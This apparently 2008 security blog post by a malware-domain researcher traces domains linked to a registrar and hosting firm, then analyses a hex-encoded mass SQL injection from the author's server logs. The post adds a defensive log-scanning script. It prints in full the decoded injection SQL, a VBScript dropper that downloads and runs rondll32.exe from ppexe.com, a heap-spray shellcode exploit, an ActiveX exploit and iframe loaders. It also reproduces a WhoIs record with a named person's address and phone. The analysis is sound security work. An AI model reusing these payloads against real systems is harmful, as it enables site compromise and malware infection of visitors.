I was investigating hiskyhost.net (AS43355), due to the fact I've now got 48 malware-associated domains going through them. More interestingly, they all resolve to housing.hiskyhost.net - a hostname that does not itself actually resolve to an IP;

http://hosts-file.net/?s=housing.hiskyhost.net

During the course of the investigation, I decided to do a WhoIs query. Prior to my trying today, EstDomains had never allowed WhoIs queries, instead opting either to refuse access to their WhoIs server or, as is the case with whois.internet.bs, to return complete rubbish (i.e. when querying whois.internet.bs, their WhoIs server will return "D D"). In October 2007, I noticed their server consistently returning the following, irrespective of the domain being queried;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.internic.net

An I/O error occured while sending to the backend.

WhoIs server: whois.estdomains.com


Having done a WhoIs query via the EstDomains website, I decided to try modifying the hpHosts site to do the query directly against their WhoIs server - and what did it return? Surprisingly, it returned the same data as their web interface - something it had never done before;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.crsnic.net

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: HISKYHOST.NET

Registrant:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
ns2.hiskyhost.net
ns1.hiskyhost.net


Administrative Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Technical Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Billing Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Status:ACTIVE


What I am rather interested in however, is their possible connection to hiskyhost.net, 2checkout.com and internet.bs.

As a side note, I've also noticed some of those that previously resolved to housing.hiskyhost.net (e.g. mcdirecting.com), though still going through EstDomains, now resolving to the VDHost Ltd/Ultranet (AS35057) netblock;

http://hosts-file.net/?s=78.157.143.133&sDM=1#matches

This also, of course, begs the question of whether there is any relation between these and EstDomains as well? Or whether it's just me being overly suspicious. Either way, if EstDomains are serious about taking malicious domains offline (and I doubt they are - more likely they're just doing it until they're out of the headlines, so to speak), then they need to take both those on VDHost/Ultranet and those on HiskyHost offline - as shown by the following, someone's already disabled some of them;

http://hosts-file.net/misc/Hiskyhost_-_VDHost_-_EstDomains.html

In the meantime, hopefully they'll continue to allow access to their WhoIs server, and not "accidentally" disable it??? Time will tell.

Monday 15 September 2008

Injection via Hex encoded SQL

I'm not surprised when I see injection attempts against my servers anymore, but I am surprised that they're still going with the same domain. The domain that they've used in this particular attack, is one that I saw a couple months or so ago (though I'm not surprised that the domain is still online, due to where it's hosted).

The entry in my server log for this one is;

Attacker: 116.232.98.101

2008-09-15 22:30:52 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:30:55 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0


The hex we're interested in is the part that begins with 0x and ends with F72 (look just before %20AS%20CHAR, since %20 is just the URL-encoded space character). Decoding the hex as plain ASCII (that is what the CAST to CHAR does), we end up with;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This tells us what the attack is: a mass SQL injection that opens a cursor over every text column of every user table (the sysobjects/syscolumns query with xtype='u') and prepends a script tag pointing at www0.douhunqn.cn to each value, so the script gets served from every page that displays that data. What does this script contain? The following of course;
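Decoding one payload by hand is fine for a single log entry, but the same thing is easier to spot across a whole log with a small script. The following is an added example (my code, not from the post) that parses IIS W3C log lines, pulls out the CAST(0x... AS CHAR(4000)) payload, decodes it and lists the script URLs it would inject. It goes one step beyond the log above in that it also handles the NVARCHAR variant of the same trick, whose hex is UTF-16LE rather than single-byte text. The log lines, the TEST-NET client addresses and the malware.example.invalid domain are all constructed; the payload is a trimmed copy of the cursor-driven UPDATE decoded above.

```python
"""Pull hex-encoded SQL injection attempts out of IIS W3C log lines.

Added example for the hpHosts post above; not code from the post. The log
lines below are constructed (TEST-NET addresses, an .invalid domain), and the
payload is a trimmed version of the cursor-driven UPDATE shown in the post.
"""
import re
from urllib.parse import unquote

# The CAST(0x... AS CHAR(4000)) idiom from the log above. Also accepts the
# NVARCHAR/NCHAR variant, whose hex is UTF-16LE rather than single-byte text.
CAST_RE = re.compile(
    r"CAST\(\s*0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<typ>N?(?:VAR)?CHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
SCRIPT_SRC_RE = re.compile(r"""<script\s+src\s*=\s*["']?([^"'>\s]+)""", re.IGNORECASE)


def decode_cast_hex(hex_blob: str, cast_type: str) -> str:
    """Decode the 0x... literal the way SQL Server would for the given cast type."""
    raw = bytes.fromhex(hex_blob)
    if cast_type.upper().startswith("N"):      # NVARCHAR / NCHAR: UTF-16LE
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")               # CHAR / VARCHAR: one byte per char


def parse_iis_line(line: str):
    """Split a W3C extended line into the fields this post's log uses.

    Field order (as in the log above): date time cs-method cs-uri-stem
    cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host
    sc-status sc-substatus sc-win32-status. IIS writes '+' for spaces inside
    fields, so a plain split on ' ' is safe.
    """
    if not line or line.startswith("#"):
        return None
    f = line.split(" ")
    if len(f) < 12:
        return None
    return {"time": f"{f[0]} {f[1]}", "uri_stem": f[3], "uri_query": unquote(f[4]),
            "client_ip": f[7], "status": f[11]}


def extract_injection(uri_query: str):
    """Return (decoded_sql, [script URLs]) if the query carries a hex CAST payload."""
    m = CAST_RE.search(uri_query)
    if not m:
        return None
    sql = decode_cast_hex(m.group("hex"), m.group("typ"))
    return sql, SCRIPT_SRC_RE.findall(sql)


def scan_log(lines):
    """Return one finding per log line that carries a hex-encoded SQL payload."""
    findings = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        hit = extract_injection(rec["uri_query"])
        if hit is None:
            continue
        sql, urls = hit
        findings.append({"time": rec["time"], "client_ip": rec["client_ip"],
                         "uri_stem": rec["uri_stem"], "status": rec["status"],
                         "sql": sql, "script_urls": urls})
    return findings


# ---- constructed sample data (not from the post's log) ----------------------
_PAYLOAD = ("DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
            "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
            "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
            "exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://malware.example.invalid/w.js\""
            "></script><!--''+['+@C+']') FETCH NEXT FROM Table_Cursor INTO @T,@C END "
            "CLOSE Table_Cursor DEALLOCATE Table_Cursor")
_UA = "Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1)"


def _line(query: str, ip: str = "203.0.113.5") -> str:
    return f"2008-09-15 22:30:52 GET /misc/some_page.txt {query} 80 - {ip} {_UA} - www.example.invalid 200 0 0"


SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status",
    # CHAR variant, the form seen in the post's log
    _line("';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + _PAYLOAD.encode("latin-1").hex().upper()
          + "%20AS%20CHAR(4000));EXEC(@S);"),
    # NVARCHAR variant: same payload, hex of its UTF-16LE encoding
    _line(";DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + _PAYLOAD.encode("utf-16-le").hex().upper()
          + "%20AS%20NVARCHAR(4000));EXEC(@S);", ip="198.51.100.7"),
    # ordinary request, must not fire
    _line("id=42&page=2", ip="192.0.2.9"),
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client_ip']} -> {f['uri_stem']} ({f['status']}) injects {f['script_urls']}")
```

The status code is carried along on purpose: a 200 against a static .txt file, as in the log above, just means the payload was ignored, but the same line against a dynamic page that talks to SQL Server is a reason to go and look at the database's text columns for the injected tag straight away.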

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 16 September 2008
Time: 02:21:49:21
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


This script is detected by AntiVir as JS/Dldr.IFrame.CR

You'll also notice that it grabs new.htm from the same domain, this is detected as HTML/IFrame.UX, and contains;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 4
iFrames: 9
Date: 16 September 2008
Time: 02:23:51:23
*****************************************************************
<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=net.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>

<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2094465.js"></script>


Oh dear, this is getting a little messy, isn't it? Let's see what this does, shall we.

http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605

This is a counter that presumably tells them how many times the script has been loaded.

http://www0.douhunqn.cn/csrss/06014.htm

This is the HTML/Rce.Gen infection, and gives us a lovely little executable called rondll32.exe (19.8KB), lovingly downloaded from ppexe.com (Ref: hpHosts Listing);

http://www.ppexe.com/csrss/rondll32.exe

It's downloaded via XMLHTTP and dropped into the temp folder using the FileSystemObject (part of the Microsoft Scripting Runtime) together with an ADODB.Stream, then launched through a dropped .vbs. For some peculiar reason, my attempts to download rondll32.exe failed (the download kept timing out).

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/06014.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 6
iFrames: 0
Date: 16 September 2008
Time: 02:31:35:31
*****************************************************************
<script language=VBScript>
On Error Resume Next
gameee = "http://www.ppexe.com/csrss/rondll32.exe"
Set gameee_2_cn = document.createElement("object")
gameeeid="clsid:"
gameeeidx="BD"
gameeeid2="96"
gameeeid3="C5"
gameeeid4="56-6"
gameeeid5="5A"
gameeeid6="3-1"
gameeeid7="1D"
gameeeid8="0-98"
gameeeid9="3A-0"
gameeeid10="0C0"
gameeeid11="4FC"
gameeeid12="29E"
gameeeid13="36"
dadong="classid"
gameee3="Micro"
gameee4="soft.XM"
giceeee="LHTTp"
gameee5="G"
gameee6="E"
gameee7="T"
gameee_2_cn.SetAttribute dadong, gameeeid&gameeeidx&gameeeid2&gameeeid3&gameeeid4&gameeeid5&gameeeid6&gameeeid7&gameeeid8&gameeeid9&gameeeid10&gameeeid11&gameeeid12&gameeeid13
Set lovegameee=gameee_2_cn.CreateObject(gameee3&gameee4&giceeee,"")
lovegameee.Open gameee5&gameee6&gameee7, gameee, False
lovegameee.Send
gameee_kiteggggggggg="Gameeeeeee.pif"
gameee_kitegggggggggs="Gameeeeeee.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456sssx="b.stream"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = gameee_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
gameeeuser="chilam"
gameee_kiteggggggggg=chilam.BuildPath(yingying,gameee_kiteggggggggg)
gameee_kitegggggggggs=chilam.BuildPath(yingying,gameee_kitegggggggggs)
Set chilams = gameee_2_cn.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovegameee.ResponseBody
</script>
<script language="JavaScript">
chilams["Savetofile"](gameee_kiteggggggggg,2);
</script>
<script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Set Love_gameee = CreateObject(""Wscript"&".Shell"")"&"'I LOVE gameee TEAM"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Love_gameee.run ("""&gameee_kiteggggggggg&""")"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"
chilams.Savetofile gameee_kitegggggggggs,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
gameeedk="O"
gameeedks="p"
gameeedkss="e"
gameeedksss="n"
Set cute_qq_cn_qq_123456 = gameee_2_cn.createobject(www&cute&qq&cn&kfqq, "")
cute_qq_cn_qq_123456.ShellExeCute gameee_kitegggggggggs, "", "", gameeedk&gameeedks&gameeedkss&gameeedksss, 0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">


http://www0.douhunqn.cn/csrss/flash.htm

This is detected as HEUR/HTML.Malware and loads yet more iFrames;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/flash.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 2
Date: 16 September 2008
Time: 02:45:17:45
*****************************************************************
<html>
<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
var yt2="play=Yes";
var yt3="path=/";
var yt4="expires=";
var yt1=yt2+yt3+yt4;
document.cookie=yt1+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{

document.write("<iframe src=i1.html width=100 height=0></iframe>");
document.write("");
}


else{
document.write("<iframe src=f2.html width=100 height=0></iframe>");
document.write("");
}
}
</script>
</html>


i1.html, detected as JS/Dldr.Agent.CQ, shows it loading one of several SWF (Flash) files depending on the installed Flash Player revision; I've not checked these yet;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/i1.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 0
Date: 16 September 2008
Time: 02:47:38:47
*****************************************************************
<Script type="text/javascript" src="swfobject.js"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "DZ";
var fuckaxp = "aa";
var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==45){
var fuckavpxa = "P";
var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==16){
var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==64){
var fuckavp = "DZ";
var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==47){
var fuckavpx = "DZ";
var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</ScripT>


f2.html, detected as HS/Dldr.Agent.QI, seems to do the same;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/f2.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 3
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:52:33:52
*****************************************************************
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script language =javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "SB";
var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==64){
var fuckavp = "SB";
var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==47){
var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==45){
var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</script>


http://www0.douhunqn.cn/csrss/net.htm

This is a rather nice little file that, according to its title, is a Visual Studio 0day exploit;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/net.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:54:25:54
*****************************************************************
<html>
<title>雨田 Microsoft Visual Studio 0day Exploit!</title>
<script language="JavaScript">

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf1 = '';
for (i=1;i<=1945;i++)
{
buf1=buf1+unescape("%0c");
}

var Evilcutecode = unescape("%u56E8%u0000%u5300%u5655%u8B57%u246C%u8B18%u3C45%u548B" +
"%u7805%uEA01%u4A8B%u8B18%u205A%uEB01%u32E3%u8B49%u8B34" +
"%uEE01%uFF31%u31FC%uACC0%uE038%u0774%uCFC1%u010D%uEBC7" +
"%u3BF2%u247C%u7514%u8BE1%u245A%uEB01%u8B66%u4B0C%u5A8B" +
"%u011C%u8BEB%u8B04%uE801%u02EB%uC031%u5E5F%u5B5D%u08C2" +
"%u5E00%u306A%u6459%u198B%u5B8B%u8B0C%u1C5B%u1B8B%u5B8B" +
"%u5308%u8E68%u0E4E%uFFEC%u89D6%u53C7%u8E68%u0E4E%uFFEC" +
"%uEBD6%u5A50%uFF52%u89D0%u52C2%u5352%uAA68%u0DFC%uFF7C" +
"%u5AD6%u4DEB%u5159%uFF52%uEBD0%u5A72%u5BEB%u6A59%u6A00" +
"%u5100%u6A52%uFF00%u53D0%uA068%uC9D5%uFF4D%u5AD6%uFF52" +
"%u53D0%u9868%u8AFE%uFF0E%uEBD6%u5944%u006A%uFF51%u53D0" +
"%u7E68%uE2D8%uFF73%u6AD6%uFF00%uE8D0%uFFAB%uFFFF%u7275" +
"%u6D6C%u6E6F%u642E%u6C6C%uE800%uFFAE%uFFFF%u5255%u444C" +
"%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%uE800%uFFA0" +
"%uFFFF%u2E2E%u005C%uB7E8%uFFFF%u2EFF%u5C2E%uE800%uFF89" +
"%uFFFF%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000");

var evilcuteSize = (Evilcutecode.length * 2);

var CutespraySled = unescape("%u9090"+"%u9090");

var CuteAddress = 0x0c0c0c0c;

var CuteBlockSize = 0x100000;

var spraySledSize = CuteBlockSize - (evilcuteSize + 1);

var CuteheapBlocks = (CuteAddress+CuteBlockSize)/CuteBlockSize;

var x = new window["Array"]();

while (CutespraySled.length*2<spraySledSize)
{
CutespraySled += CutespraySled;
}

CutespraySled = CutespraySled.substring(0,spraySledSize/2);

for (i=0;i<CuteheapBlocks;i++)
{
x[i] = CutespraySled + Evilcutecode;
}

document.write(body+buf1+body1);

</script>
</html>


Malzilla had this to say about the %u escaped code;



http://www0.douhunqn.cn/csrss/ff.htm

Alas, they really want you to have the executable from ppexe.com, as shown by the following, detected as EXP/SnapshotViewe.B;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/ff.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:00:02:00
*****************************************************************
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";

var yt1="snpvw.Snapshot Viewer Control.1";
var objlcx = new ActiveXObject(yt1);

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);


for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://www.ppexe.com/csrss/rondll32.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

</script>


http://www0.douhunqn.cn/csrss/tr.htm

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/tr.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 4
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:03:17:03
*****************************************************************
<iframe src=http://www.lukclick.com/search/51777.htm width=100 height=0></iframe>
<iframe src=http://www.letusearch.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.onegameplace.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.kkexe.com/key.htm width=100 height=0></iframe>


Yeesh! They really want to give us as much as possible, don't they?

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.lukclick.com/search/51777.htm
Server IP: 208.53.147.195 [ . ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 7
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:05:58:05
*****************************************************************
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> ads </title>
</head>
<body>
<IFRAME src=http://www.afeisearch.com/portal.php?r=0&username=awei width=0 height=0></IFRAME>
<iframe src="http://www.u2clicks.com/portal.php?r=0&username=jiajia" width="0" height="0" name="cpm"></iframe>
<iframe src="http://www.values7.com/banners/view_ad.php?username=mhv88&format=1" style="border:none" name="advertising" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="31" width="88"></iframe>
<IFRAME src="http://www.kikclicks.com/engine/?ref=beibei" width=1 height=1></IFRAME>
<iframe width="0" height="0" src="http://www.lukclick.com/search/luckymouse.htm"></iframe>
<iframe width="0" height="0" src="http://www.lukclick.com/search/18889.htm"></iframe>
<iframe width=468 height=60 src='http://www.advpoints.com/promote15.php?uid=8918' frameborder=0 marginwidth=0 marginheight=0 vspace=1 hspace=1 allowtransparency=true scrolling=no></iframe>
</body>
<script src='http://goako.com/accounts_js_feed_wizard_display_results.php?idUser=3&username=test&keywords=work at home&adult_filter=off&results_number=10&results_display_style=vertical'></script>
<script src='http://s90.cnzz.com/stat.php?id=1033093&web_id=1033093&online=1&show=line' language='JavaScript' charset='gb2312'></script>
</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
